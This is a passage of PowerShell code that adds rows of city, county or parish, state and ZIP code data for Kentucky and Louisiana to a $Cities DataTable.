$Cities.Rows.Add("Revelo","McCreary","Kentucky","KY","21","42638") + $null = $Cities.Rows.Add("Webbs cross road","Russell","Kentucky","KY","21","42642") + $null = $Cities.Rows.Add("Stearns","McCreary","Kentucky","KY","21","42647") + $null = $Cities.Rows.Add("Strunk","McCreary","Kentucky","KY","21","42649") + $null = $Cities.Rows.Add("Wiborg","McCreary","Kentucky","KY","21","42653") + $null = $Cities.Rows.Add("Zcta 426hh","Clinton","Kentucky","KY","21","426HH") + $null = $Cities.Rows.Add("Zcta 426xx","McCreary","Kentucky","KY","21","426XX") + $null = $Cities.Rows.Add("E town","Hardin","Kentucky","KY","21","42701") + $null = $Cities.Rows.Add("Bakerton","Cumberland","Kentucky","KY","21","42711") + $null = $Cities.Rows.Add("Big clifty","Grayson","Kentucky","KY","21","42712") + $null = $Cities.Rows.Add("Bonnieville","Hart","Kentucky","KY","21","42713") + $null = $Cities.Rows.Add("Breeding","Adair","Kentucky","KY","21","42715") + $null = $Cities.Rows.Add("Buffalo","Larue","Kentucky","KY","21","42716") + $null = $Cities.Rows.Add("Burkesville","Cumberland","Kentucky","KY","21","42717") + $null = $Cities.Rows.Add("Campbellsville","Taylor","Kentucky","KY","21","42718") + $null = $Cities.Rows.Add("Caneyville","Grayson","Kentucky","KY","21","42721") + $null = $Cities.Rows.Add("Canmer","Hart","Kentucky","KY","21","42722") + $null = $Cities.Rows.Add("Stephensburg","Hardin","Kentucky","KY","21","42724") + $null = $Cities.Rows.Add("Wax","Grayson","Kentucky","KY","21","42726") + $null = $Cities.Rows.Add("Montpelier","Adair","Kentucky","KY","21","42728") + $null = $Cities.Rows.Add("Cub run","Hart","Kentucky","KY","21","42729") + $null = $Cities.Rows.Add("Dubre","Cumberland","Kentucky","KY","21","42731") + $null = $Cities.Rows.Add("E view","Hardin","Kentucky","KY","21","42732") + $null = $Cities.Rows.Add("Elk horn","Taylor","Kentucky","KY","21","42733") + $null = $Cities.Rows.Add("Glendale","Hardin","Kentucky","KY","21","42740") + $null = $Cities.Rows.Add("Glens fork","Adair","Kentucky","KY","21","42741") + $null = $Cities.Rows.Add("Gradyville","Adair","Kentucky","KY","21","42742") + $null = $Cities.Rows.Add("Greensburg","Green","Kentucky","KY","21","42743") + $null = $Cities.Rows.Add("Hardyville","Hart","Kentucky","KY","21","42746") + $null = $Cities.Rows.Add("Hodgenville","Larue","Kentucky","KY","21","42748") + $null = $Cities.Rows.Add("Horse cave","Hart","Kentucky","KY","21","42749") + $null = $Cities.Rows.Add("Knifley","Adair","Kentucky","KY","21","42753") + $null = $Cities.Rows.Add("Sadler","Grayson","Kentucky","KY","21","42754") + $null = $Cities.Rows.Add("Magnolia","Larue","Kentucky","KY","21","42757") + $null = $Cities.Rows.Add("Marrowbone","Cumberland","Kentucky","KY","21","42759") + $null = $Cities.Rows.Add("Milltown","Adair","Kentucky","KY","21","42761") + $null = $Cities.Rows.Add("Millwood","Grayson","Kentucky","KY","21","42762") + $null = $Cities.Rows.Add("Munfordville","Hart","Kentucky","KY","21","42765") + $null = $Cities.Rows.Add("Sonora","Hardin","Kentucky","KY","21","42776") + $null = $Cities.Rows.Add("Summersville","Green","Kentucky","KY","21","42782") + $null = $Cities.Rows.Add("Upton","Hardin","Kentucky","KY","21","42784") + $null = $Cities.Rows.Add("White mills","Hardin","Kentucky","KY","21","42788") + $null = $Cities.Rows.Add("Zcta 427hh","Breckinridge","Kentucky","KY","21","427HH") + $null = $Cities.Rows.Add("Metairie","Jefferson Parish","Louisiana","LA","22","70001") + $null = $Cities.Rows.Add("Metairie","Jefferson Parish","Louisiana","LA","22","70002") + $null = $Cities.Rows.Add("Metairie","Jefferson Parish","Louisiana","LA","22","70003") + $null = $Cities.Rows.Add("Metairie","Jefferson Parish","Louisiana","LA","22","70005") + $null = $Cities.Rows.Add("Metairie","Jefferson Parish","Louisiana","LA","22","70006") + $null = $Cities.Rows.Add("Des allemands","St. Charles Parish","Louisiana","LA","22","70030") + $null = $Cities.Rows.Add("Ama","St. Charles Parish","Louisiana","LA","22","70031") + $null = $Cities.Rows.Add("Arabi","St. Bernard Parish","Louisiana","LA","22","70032") + $null = $Cities.Rows.Add("Barataria","Jefferson Parish","Louisiana","LA","22","70036") + $null = $Cities.Rows.Add("Belle chasse","Plaquemines Parish","Louisiana","LA","22","70037") + $null = $Cities.Rows.Add("Boothville","Plaquemines Parish","Louisiana","LA","22","70038") + $null = $Cities.Rows.Add("Boutte","St. Charles Parish","Louisiana","LA","22","70039") + $null = $Cities.Rows.Add("Braithwaite","Plaquemines Parish","Louisiana","LA","22","70040") + $null = $Cities.Rows.Add("Buras","Plaquemines Parish","Louisiana","LA","22","70041") + $null = $Cities.Rows.Add("Chalmette","St. Bernard Parish","Louisiana","LA","22","70043") + $null = $Cities.Rows.Add("New sarpy","St. Charles Parish","Louisiana","LA","22","70047") + $null = $Cities.Rows.Add("Edgard","St. John the Baptist Parish","Louisiana","LA","22","70049") + $null = $Cities.Rows.Add("Empire","Plaquemines Parish","Louisiana","LA","22","70050") + $null = $Cities.Rows.Add("Garyville","St. John the Baptist Parish","Louisiana","LA","22","70051") + $null = $Cities.Rows.Add("Gramercy","St. James Parish","Louisiana","LA","22","70052") + $null = $Cities.Rows.Add("Gretna","Jefferson Parish","Louisiana","LA","22","70053") + $null = $Cities.Rows.Add("Terrytown","Jefferson Parish","Louisiana","LA","22","70056") + $null = $Cities.Rows.Add("Hahnville","St. Charles Parish","Louisiana","LA","22","70057") + $null = $Cities.Rows.Add("Harvey","Jefferson Parish","Louisiana","LA","22","70058") + $null = $Cities.Rows.Add("Kenner","Jefferson Parish","Louisiana","LA","22","70062") + $null = $Cities.Rows.Add("Kenner","Jefferson Parish","Louisiana","LA","22","70065") + $null = $Cities.Rows.Add("Killona","St. Charles Parish","Louisiana","LA","22","70066") + $null = $Cities.Rows.Add("Lafitte","Jefferson Parish","Louisiana","LA","22","70067") + $null = $Cities.Rows.Add("La place","St. John the Baptist Parish","Louisiana","LA","22","70068") + $null = $Cities.Rows.Add("Luling","St. Charles Parish","Louisiana","LA","22","70070") + $null = $Cities.Rows.Add("Lutcher","St. James Parish","Louisiana","LA","22","70071") + $null = $Cities.Rows.Add("Marrero","Jefferson Parish","Louisiana","LA","22","70072") + $null = $Cities.Rows.Add("Meraux","St. Bernard Parish","Louisiana","LA","22","70075") + $null = $Cities.Rows.Add("Mount airy","St. John the Baptist Parish","Louisiana","LA","22","70076") + $null = $Cities.Rows.Add("Norco","St. Charles Parish","Louisiana","LA","22","70079") + $null = $Cities.Rows.Add("Paradis","St. Charles Parish","Louisiana","LA","22","70080") + $null = $Cities.Rows.Add("Pointe a la hach","Plaquemines Parish","Louisiana","LA","22","70082") + $null = $Cities.Rows.Add("Port sulphur","Plaquemines Parish","Louisiana","LA","22","70083") + $null = $Cities.Rows.Add("Reserve","St. John the Baptist Parish","Louisiana","LA","22","70084") + $null = $Cities.Rows.Add("Saint bernard","St. Bernard Parish","Louisiana","LA","22","70085") + $null = $Cities.Rows.Add("Saint james","St. James Parish","Louisiana","LA","22","70086") + $null = $Cities.Rows.Add("Saint rose","St. Charles Parish","Louisiana","LA","22","70087") + $null = $Cities.Rows.Add("Vacherie","St. James Parish","Louisiana","LA","22","70090") + $null = $Cities.Rows.Add("Venice","Plaquemines Parish","Louisiana","LA","22","70091") + $null = $Cities.Rows.Add("Violet","St. Bernard Parish","Louisiana","LA","22","70092") + $null = $Cities.Rows.Add("Bridge city","Jefferson Parish","Louisiana","LA","22","70094") + $null = $Cities.Rows.Add("Zcta 700hh","Jefferson Parish","Louisiana","LA","22","700HH") + $null = $Cities.Rows.Add("Zcta 700xx","St. Charles Parish","Louisiana","LA","22","700XX") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70112") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70113") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70114") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70115") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70116") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70117") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70118") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70119") + $null = $Cities.Rows.Add("Jefferson","Jefferson Parish","Louisiana","LA","22","70121") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70122") + $null = $Cities.Rows.Add("Harahan","Jefferson Parish","Louisiana","LA","22","70123") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70124") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70125") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70126") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70127") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70128") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70129") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70130") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70131") + $null = $Cities.Rows.Add("New orleans","Orleans Parish","Louisiana","LA","22","70163") + $null = $Cities.Rows.Add("Zcta 701hh","Jefferson Parish","Louisiana","LA","22","701HH") + $null = $Cities.Rows.Add("Zcta 701xx","Orleans Parish","Louisiana","LA","22","701XX") + $null = $Cities.Rows.Add("Thibodaux","Lafourche Parish","Louisiana","LA","22","70301") + $null = $Cities.Rows.Add("Pierre part","Assumption Parish","Louisiana","LA","22","70339") + $null = $Cities.Rows.Add("Belle rose","Assumption Parish","Louisiana","LA","22","70341") + $null = $Cities.Rows.Add("Berwick","St. Mary Parish","Louisiana","LA","22","70342") + $null = $Cities.Rows.Add("Bourg","Terrebonne Parish","Louisiana","LA","22","70343") + $null = $Cities.Rows.Add("Chauvin","Terrebonne Parish","Louisiana","LA","22","70344") + $null = $Cities.Rows.Add("Cut off","Lafourche Parish","Louisiana","LA","22","70345") + $null = $Cities.Rows.Add("Donaldsonville","Ascension Parish","Louisiana","LA","22","70346") + $null = $Cities.Rows.Add("Dulac","Terrebonne Parish","Louisiana","LA","22","70353") + $null = $Cities.Rows.Add("Galliano","Lafourche Parish","Louisiana","LA","22","70354") + $null = $Cities.Rows.Add("Gheens","Lafourche Parish","Louisiana","LA","22","70355") + $null = $Cities.Rows.Add("Gibson","Terrebonne Parish","Louisiana","LA","22","70356") + $null = $Cities.Rows.Add("Golden meadow","Lafourche Parish","Louisiana","LA","22","70357") + $null = $Cities.Rows.Add("Grand isle","Jefferson Parish","Louisiana","LA","22","70358") + $null = $Cities.Rows.Add("Gray","Terrebonne Parish","Louisiana","LA","22","70359") + $null = $Cities.Rows.Add("Houma","Terrebonne Parish","Louisiana","LA","22","70360") + $null = $Cities.Rows.Add("Houma","Terrebonne Parish","Louisiana","LA","22","70363") + $null = $Cities.Rows.Add("Houma","Terrebonne Parish","Louisiana","LA","22","70364") + $null = $Cities.Rows.Add("Labadieville","Assumption Parish","Louisiana","LA","22","70372") + $null = $Cities.Rows.Add("Larose","Lafourche Parish","Louisiana","LA","22","70373") + $null = $Cities.Rows.Add("Lockport","Lafourche Parish","Louisiana","LA","22","70374") + $null = $Cities.Rows.Add("Mathews","Lafourche Parish","Louisiana","LA","22","70375") + $null = $Cities.Rows.Add("Montegut","Terrebonne Parish","Louisiana","LA","22","70377") + $null = $Cities.Rows.Add("Morgan city","St. Mary Parish","Louisiana","LA","22","70380") + $null = $Cities.Rows.Add("Napoleonville","Assumption Parish","Louisiana","LA","22","70390") + $null = $Cities.Rows.Add("Paincourtville","Assumption Parish","Louisiana","LA","22","70391") + $null = $Cities.Rows.Add("Patterson","St. Mary Parish","Louisiana","LA","22","70392") + $null = $Cities.Rows.Add("Plattenville","Assumption Parish","Louisiana","LA","22","70393") + $null = $Cities.Rows.Add("Raceland","Lafourche Parish","Louisiana","LA","22","70394") + $null = $Cities.Rows.Add("Schriever","Terrebonne Parish","Louisiana","LA","22","70395") + $null = $Cities.Rows.Add("Theriot","Terrebonne Parish","Louisiana","LA","22","70397") + $null = $Cities.Rows.Add("Zcta 703hh","Ascension Parish","Louisiana","LA","22","703HH") + $null = $Cities.Rows.Add("Zcta 703xx","Terrebonne Parish","Louisiana","LA","22","703XX") + $null = $Cities.Rows.Add("Hammond","Tangipahoa Parish","Louisiana","LA","22","70401") + $null = $Cities.Rows.Add("Hammond","Tangipahoa Parish","Louisiana","LA","22","70403") + $null = $Cities.Rows.Add("Abita springs","St. Tammany Parish","Louisiana","LA","22","70420") + $null = $Cities.Rows.Add("Amite","Tangipahoa Parish","Louisiana","LA","22","70422") + $null = $Cities.Rows.Add("Angie","Washington Parish","Louisiana","LA","22","70426") + $null = $Cities.Rows.Add("Bogalusa","Washington Parish","Louisiana","LA","22","70427") + $null = $Cities.Rows.Add("Bush","St. Tammany Parish","Louisiana","LA","22","70431") + $null = $Cities.Rows.Add("Covington","St. Tammany Parish","Louisiana","LA","22","70433") + $null = $Cities.Rows.Add("Zcta 70435","St. Tammany Parish","Louisiana","LA","22","70435") + $null = $Cities.Rows.Add("Fluker","Tangipahoa Parish","Louisiana","LA","22","70436") + $null = $Cities.Rows.Add("Folsom","St. Tammany Parish","Louisiana","LA","22","70437") + $null = $Cities.Rows.Add("Franklinton","Washington Parish","Louisiana","LA","22","70438") + $null = $Cities.Rows.Add("Greensburg","St. Helena Parish","Louisiana","LA","22","70441") + $null = $Cities.Rows.Add("Husser","Tangipahoa Parish","Louisiana","LA","22","70442") + $null = $Cities.Rows.Add("Independence","Tangipahoa Parish","Louisiana","LA","22","70443") + $null = $Cities.Rows.Add("Kentwood","Tangipahoa Parish","Louisiana","LA","22","70444") + $null = $Cities.Rows.Add("Lacombe","St. Tammany Parish","Louisiana","LA","22","70445") + $null = $Cities.Rows.Add("Loranger","Tangipahoa Parish","Louisiana","LA","22","70446") + $null = $Cities.Rows.Add("Madisonville","St. Tammany Parish","Louisiana","LA","22","70447") + $null = $Cities.Rows.Add("Mandeville","St. Tammany Parish","Louisiana","LA","22","70448") + $null = $Cities.Rows.Add("Maurepas","Livingston Parish","Louisiana","LA","22","70449") + $null = $Cities.Rows.Add("Mount hermon","Washington Parish","Louisiana","LA","22","70450") + $null = $Cities.Rows.Add("Natalbany","Tangipahoa Parish","Louisiana","LA","22","70451") + $null = $Cities.Rows.Add("Pearl river","St. Tammany Parish","Louisiana","LA","22","70452") + $null = $Cities.Rows.Add("Pine grove","St. Helena Parish","Louisiana","LA","22","70453") + $null = $Cities.Rows.Add("Ponchatoula","Tangipahoa Parish","Louisiana","LA","22","70454") + $null = $Cities.Rows.Add("Robert","Tangipahoa Parish","Louisiana","LA","22","70455") + $null = $Cities.Rows.Add("Roseland","Tangipahoa Parish","Louisiana","LA","22","70456") + $null = $Cities.Rows.Add("Slidell","St. Tammany Parish","Louisiana","LA","22","70458") + $null = $Cities.Rows.Add("Slidell","St. Tammany Parish","Louisiana","LA","22","70460") + $null = $Cities.Rows.Add("Slidell","St. Tammany Parish","Louisiana","LA","22","70461") + $null = $Cities.Rows.Add("Springfield","Livingston Parish","Louisiana","LA","22","70462") + $null = $Cities.Rows.Add("Sun","St. Tammany Parish","Louisiana","LA","22","70463") + $null = $Cities.Rows.Add("Talisheek","St. Tammany Parish","Louisiana","LA","22","70464") + $null = $Cities.Rows.Add("Tangipahoa","Tangipahoa Parish","Louisiana","LA","22","70465") + $null = $Cities.Rows.Add("Tickfaw","Tangipahoa Parish","Louisiana","LA","22","70466") + $null = $Cities.Rows.Add("Zcta 70471","St. Tammany Parish","Louisiana","LA","22","70471") + $null = $Cities.Rows.Add("Zcta 704hh","Ascension Parish","Louisiana","LA","22","704HH") + $null = $Cities.Rows.Add("Zcta 704xx","St. Tammany Parish","Louisiana","LA","22","704XX") + $null = $Cities.Rows.Add("Lafayette","Lafayette Parish","Louisiana","LA","22","70501") + $null = $Cities.Rows.Add("Lafayette","Lafayette Parish","Louisiana","LA","22","70503") + $null = $Cities.Rows.Add("Lafayette","Lafayette Parish","Louisiana","LA","22","70506") + $null = $Cities.Rows.Add("Lafayette","Lafayette Parish","Louisiana","LA","22","70507") + $null = $Cities.Rows.Add("Lafayette","Lafayette Parish","Louisiana","LA","22","70508") + $null = $Cities.Rows.Add("Forked island","Vermilion Parish","Louisiana","LA","22","70510") + $null = $Cities.Rows.Add("Arnaudville","St. Landry Parish","Louisiana","LA","22","70512") + $null = $Cities.Rows.Add("Avery island","Iberia Parish","Louisiana","LA","22","70513") + $null = $Cities.Rows.Add("Baldwin","St. Mary Parish","Louisiana","LA","22","70514") + $null = $Cities.Rows.Add("Basile","Evangeline Parish","Louisiana","LA","22","70515") + $null = $Cities.Rows.Add("Branch","Acadia Parish","Louisiana","LA","22","70516") + $null = $Cities.Rows.Add("Henderson","St. Martin Parish","Louisiana","LA","22","70517") + $null = $Cities.Rows.Add("Broussard","Lafayette Parish","Louisiana","LA","22","70518") + $null = $Cities.Rows.Add("Carencro","Lafayette Parish","Louisiana","LA","22","70520") + $null = $Cities.Rows.Add("Cecilia","St. Martin Parish","Louisiana","LA","22","70521") + $null = $Cities.Rows.Add("Charenton","St. Mary Parish","Louisiana","LA","22","70523") + $null = $Cities.Rows.Add("Chataignier","Evangeline Parish","Louisiana","LA","22","70524") + $null = $Cities.Rows.Add("Church point","Acadia Parish","Louisiana","LA","22","70525") + $null = $Cities.Rows.Add("Crowley","Acadia Parish","Louisiana","LA","22","70526") + $null = $Cities.Rows.Add("Delcambre","Vermilion Parish","Louisiana","LA","22","70528") + $null = $Cities.Rows.Add("Duson","Lafayette Parish","Louisiana","LA","22","70529") + $null = $Cities.Rows.Add("Egan","Acadia Parish","Louisiana","LA","22","70531") + $null = $Cities.Rows.Add("Elton","Jefferson Davis Parish","Louisiana","LA","22","70532") + $null = $Cities.Rows.Add("Erath","Vermilion Parish","Louisiana","LA","22","70533") + $null = $Cities.Rows.Add("Estherwood","Acadia Parish","Louisiana","LA","22","70534") + $null = $Cities.Rows.Add("Eunice","St. Landry Parish","Louisiana","LA","22","70535") + $null = $Cities.Rows.Add("Evangeline","Acadia Parish","Louisiana","LA","22","70537") + $null = $Cities.Rows.Add("Franklin","St. Mary Parish","Louisiana","LA","22","70538") + $null = $Cities.Rows.Add("Garden city","St. Mary Parish","Louisiana","LA","22","70540") + $null = $Cities.Rows.Add("Grand coteau","St. Landry Parish","Louisiana","LA","22","70541") + $null = $Cities.Rows.Add("Gueydan","Vermilion Parish","Louisiana","LA","22","70542") + $null = $Cities.Rows.Add("Iota","Acadia Parish","Louisiana","LA","22","70543") + $null = $Cities.Rows.Add("Jeanerette","Iberia Parish","Louisiana","LA","22","70544") + $null = $Cities.Rows.Add("Jennings","Jefferson Davis Parish","Louisiana","LA","22","70546") + $null = $Cities.Rows.Add("Kaplan","Vermilion Parish","Louisiana","LA","22","70548") + $null = $Cities.Rows.Add("Lake arthur","Jefferson Davis Parish","Louisiana","LA","22","70549") + $null = $Cities.Rows.Add("Lawtell","St. Landry Parish","Louisiana","LA","22","70550") + $null = $Cities.Rows.Add("Loreauville","Iberia Parish","Louisiana","LA","22","70552") + $null = $Cities.Rows.Add("Mamou","Evangeline Parish","Louisiana","LA","22","70554") + $null = $Cities.Rows.Add("Maurice","Vermilion Parish","Louisiana","LA","22","70555") + $null = $Cities.Rows.Add("Mermentau","Acadia Parish","Louisiana","LA","22","70556") + $null = $Cities.Rows.Add("Milton","Lafayette Parish","Louisiana","LA","22","70558") + $null = $Cities.Rows.Add("Midland","Acadia Parish","Louisiana","LA","22","70559") + $null = $Cities.Rows.Add("New iberia","Iberia Parish","Louisiana","LA","22","70560") + $null = $Cities.Rows.Add("Zcta 70563","Iberia Parish","Louisiana","LA","22","70563") + $null = $Cities.Rows.Add("Opelousas","St. Landry Parish","Louisiana","LA","22","70570") + $null = $Cities.Rows.Add("Pine prairie","Evangeline Parish","Louisiana","LA","22","70576") + $null = $Cities.Rows.Add("Port barre","St. Landry Parish","Louisiana","LA","22","70577") + $null = $Cities.Rows.Add("Rayne","Acadia Parish","Louisiana","LA","22","70578") + $null = $Cities.Rows.Add("Reddell","Evangeline Parish","Louisiana","LA","22","70580") + $null = $Cities.Rows.Add("Roanoke","Jefferson Davis Parish","Louisiana","LA","22","70581") + $null = $Cities.Rows.Add("Saint martinvill","St. Martin Parish","Louisiana","LA","22","70582") + $null = $Cities.Rows.Add("Scott","Lafayette Parish","Louisiana","LA","22","70583") + $null = $Cities.Rows.Add("Cankton","St. Landry Parish","Louisiana","LA","22","70584") + $null = $Cities.Rows.Add("Turkey creek","Evangeline Parish","Louisiana","LA","22","70585") + $null = $Cities.Rows.Add("Ville platte","Evangeline Parish","Louisiana","LA","22","70586") + $null = $Cities.Rows.Add("Washington","St. Landry Parish","Louisiana","LA","22","70589") + $null = $Cities.Rows.Add("Welsh","Jefferson Davis Parish","Louisiana","LA","22","70591") + $null = $Cities.Rows.Add("Youngsville","Lafayette Parish","Louisiana","LA","22","70592") + $null = $Cities.Rows.Add("Zcta 705hh","Acadia Parish","Louisiana","LA","22","705HH") + $null = $Cities.Rows.Add("Zcta 705xx","St. Mary Parish","Louisiana","LA","22","705XX") + $null = $Cities.Rows.Add("Lake charles","Calcasieu Parish","Louisiana","LA","22","70601") + $null = $Cities.Rows.Add("Lake charles","Calcasieu Parish","Louisiana","LA","22","70605") + $null = $Cities.Rows.Add("Lake charles","Calcasieu Parish","Louisiana","LA","22","70607") + $null = $Cities.Rows.Add("Lake charles","Calcasieu Parish","Louisiana","LA","22","70611") + $null = $Cities.Rows.Add("Lake charles","Calcasieu Parish","Louisiana","LA","22","70615") + $null = $Cities.Rows.Add("Bell city","Calcasieu Parish","Louisiana","LA","22","70630") + $null = $Cities.Rows.Add("Cameron","Cameron Parish","Louisiana","LA","22","70631") + $null = $Cities.Rows.Add("Creole","Cameron Parish","Louisiana","LA","22","70632") + $null = $Cities.Rows.Add("Dequincy","Calcasieu Parish","Louisiana","LA","22","70633") + $null = $Cities.Rows.Add("Deridder","Beauregard Parish","Louisiana","LA","22","70634") + $null = $Cities.Rows.Add("Dry creek","Allen Parish","Louisiana","LA","22","70637") + $null = $Cities.Rows.Add("Elizabeth","Allen Parish","Louisiana","LA","22","70638") + $null = $Cities.Rows.Add("Evans","Vernon Parish","Louisiana","LA","22","70639") + $null = $Cities.Rows.Add("Fenton","Jefferson Davis Parish","Louisiana","LA","22","70640") + $null = $Cities.Rows.Add("Grand chenier","Cameron Parish","Louisiana","LA","22","70643") + $null = $Cities.Rows.Add("Grant","Allen Parish","Louisiana","LA","22","70644") + $null = $Cities.Rows.Add("Hackberry","Cameron Parish","Louisiana","LA","22","70645") + $null = $Cities.Rows.Add("Hayes","Calcasieu Parish","Louisiana","LA","22","70646") + $null = $Cities.Rows.Add("Iowa","Calcasieu Parish","Louisiana","LA","22","70647") + $null = $Cities.Rows.Add("Kinder","Allen Parish","Louisiana","LA","22","70648") + $null = $Cities.Rows.Add("Lacassine","Jefferson Davis Parish","Louisiana","LA","22","70650") + $null = $Cities.Rows.Add("Leblanc","Allen Parish","Louisiana","LA","22","70651") + $null = $Cities.Rows.Add("Longville","Beauregard Parish","Louisiana","LA","22","70652") + $null = $Cities.Rows.Add("Fields","Beauregard Parish","Louisiana","LA","22","70653") + $null = $Cities.Rows.Add("Mittie","Allen Parish","Louisiana","LA","22","70654") + $null = $Cities.Rows.Add("Oberlin","Allen Parish","Louisiana","LA","22","70655") + $null = $Cities.Rows.Add("Pitkin","Vernon Parish","Louisiana","LA","22","70656") + $null = $Cities.Rows.Add("Ragley","Beauregard Parish","Louisiana","LA","22","70657") + $null = $Cities.Rows.Add("Reeves","Allen Parish","Louisiana","LA","22","70658") + $null = $Cities.Rows.Add("Rosepine","Vernon Parish","Louisiana","LA","22","70659") + $null = $Cities.Rows.Add("Singer","Beauregard Parish","Louisiana","LA","22","70660") + $null = $Cities.Rows.Add("Starks","Calcasieu Parish","Louisiana","LA","22","70661") + $null = $Cities.Rows.Add("Sugartown","Beauregard Parish","Louisiana","LA","22","70662") + $null = $Cities.Rows.Add("Sulphur","Calcasieu Parish","Louisiana","LA","22","70663") + $null = $Cities.Rows.Add("Zcta 70665","Calcasieu Parish","Louisiana","LA","22","70665") + $null = $Cities.Rows.Add("Vinton","Calcasieu Parish","Louisiana","LA","22","70668") + $null = $Cities.Rows.Add("Westlake","Calcasieu Parish","Louisiana","LA","22","70669") + $null = $Cities.Rows.Add("Zcta 706hh","Beauregard Parish","Louisiana","LA","22","706HH") + $null = $Cities.Rows.Add("Zcta 706xx","Beauregard Parish","Louisiana","LA","22","706XX") + $null = $Cities.Rows.Add("Zcta 70706","Livingston Parish","Louisiana","LA","22","70706") + $null = $Cities.Rows.Add("Addis","West Baton Rouge Parish","Louisiana","LA","22","70710") + $null = $Cities.Rows.Add("Albany","Livingston Parish","Louisiana","LA","22","70711") + $null = $Cities.Rows.Add("Angola","West Feliciana Parish","Louisiana","LA","22","70712") + $null = $Cities.Rows.Add("Baker","East Baton Rouge Parish","Louisiana","LA","22","70714") + $null = $Cities.Rows.Add("Batchelor","Pointe Coupee Parish","Louisiana","LA","22","70715") + $null = $Cities.Rows.Add("Blanks","Pointe Coupee Parish","Louisiana","LA","22","70717") + $null = $Cities.Rows.Add("Brusly","West Baton Rouge Parish","Louisiana","LA","22","70719") + $null = $Cities.Rows.Add("Bueche","West Baton Rouge Parish","Louisiana","LA","22","70720") + $null = $Cities.Rows.Add("Point clair","Iberville Parish","Louisiana","LA","22","70721") + $null = $Cities.Rows.Add("Clinton","East Feliciana Parish","Louisiana","LA","22","70722") + $null = $Cities.Rows.Add("Convent","St. James Parish","Louisiana","LA","22","70723") + $null = $Cities.Rows.Add("Darrow","Ascension Parish","Louisiana","LA","22","70725") + $null = $Cities.Rows.Add("Port vincent","Livingston Parish","Louisiana","LA","22","70726") + $null = $Cities.Rows.Add("Erwinville","Pointe Coupee Parish","Louisiana","LA","22","70729") + $null = $Cities.Rows.Add("Ethel","East Feliciana Parish","Louisiana","LA","22","70730") + $null = $Cities.Rows.Add("Fordoche","Pointe Coupee Parish","Louisiana","LA","22","70732") + $null = $Cities.Rows.Add("French settlemen","Livingston Parish","Louisiana","LA","22","70733") + $null = $Cities.Rows.Add("Geismar","Ascension Parish","Louisiana","LA","22","70734") + $null = $Cities.Rows.Add("Glynn","Pointe Coupee Parish","Louisiana","LA","22","70736") + $null = $Cities.Rows.Add("Gonzales","Ascension Parish","Louisiana","LA","22","70737") + $null = $Cities.Rows.Add("Greenwell spring","East Baton Rouge Parish","Louisiana","LA","22","70739") + $null = $Cities.Rows.Add("Grosse tete","Iberville Parish","Louisiana","LA","22","70740") + $null = $Cities.Rows.Add("Hester","St. James Parish","Louisiana","LA","22","70743") + $null = $Cities.Rows.Add("Holden","Livingston Parish","Louisiana","LA","22","70744") + $null = $Cities.Rows.Add("Innis","Pointe Coupee Parish","Louisiana","LA","22","70747") + $null = $Cities.Rows.Add("The bluffs","East Feliciana Parish","Louisiana","LA","22","70748") + $null = $Cities.Rows.Add("Jarreau","Pointe Coupee Parish","Louisiana","LA","22","70749") + $null = $Cities.Rows.Add("Krotz springs","St. Landry Parish","Louisiana","LA","22","70750") + $null = $Cities.Rows.Add("Lakeland","Pointe Coupee Parish","Louisiana","LA","22","70752") + $null = $Cities.Rows.Add("Lettsworth","Pointe Coupee Parish","Louisiana","LA","22","70753") + $null = $Cities.Rows.Add("Livingston","Livingston Parish","Louisiana","LA","22","70754") + $null = $Cities.Rows.Add("Livonia","Pointe Coupee Parish","Louisiana","LA","22","70755") + $null = $Cities.Rows.Add("Lottie","Pointe Coupee Parish","Louisiana","LA","22","70756") + $null = $Cities.Rows.Add("Ramah","Iberville Parish","Louisiana","LA","22","70757") + $null = $Cities.Rows.Add("Morganza","Pointe Coupee Parish","Louisiana","LA","22","70759") + $null = $Cities.Rows.Add("New roads","Pointe Coupee Parish","Louisiana","LA","22","70760") + $null = $Cities.Rows.Add("Norwood","East Feliciana Parish","Louisiana","LA","22","70761") + $null = $Cities.Rows.Add("Oscar","Pointe Coupee Parish","Louisiana","LA","22","70762") + $null = $Cities.Rows.Add("Paulina","St. James Parish","Louisiana","LA","22","70763") + $null = $Cities.Rows.Add("Plaquemine","Iberville Parish","Louisiana","LA","22","70764") + $null = $Cities.Rows.Add("Port allen","West Baton Rouge Parish","Louisiana","LA","22","70767") + $null = $Cities.Rows.Add("Galvez","Ascension Parish","Louisiana","LA","22","70769") + $null = $Cities.Rows.Add("Pride","East Baton Rouge Parish","Louisiana","LA","22","70770") + $null = $Cities.Rows.Add("Rosedale","Iberville Parish","Louisiana","LA","22","70772") + $null = $Cities.Rows.Add("Rougon","Pointe Coupee Parish","Louisiana","LA","22","70773") + $null = $Cities.Rows.Add("Saint amant","Ascension Parish","Louisiana","LA","22","70774") + $null = $Cities.Rows.Add("Bains","West Feliciana Parish","Louisiana","LA","22","70775") + $null = $Cities.Rows.Add("Iberville","Iberville Parish","Louisiana","LA","22","70776") + $null = $Cities.Rows.Add("Slaughter","East Feliciana Parish","Louisiana","LA","22","70777") + $null = $Cities.Rows.Add("Sorrento","Ascension Parish","Louisiana","LA","22","70778") + $null = $Cities.Rows.Add("Sunshine","Iberville Parish","Louisiana","LA","22","70780") + $null = $Cities.Rows.Add("Torbert","Pointe Coupee Parish","Louisiana","LA","22","70781") + $null = $Cities.Rows.Add("Tunica","West Feliciana 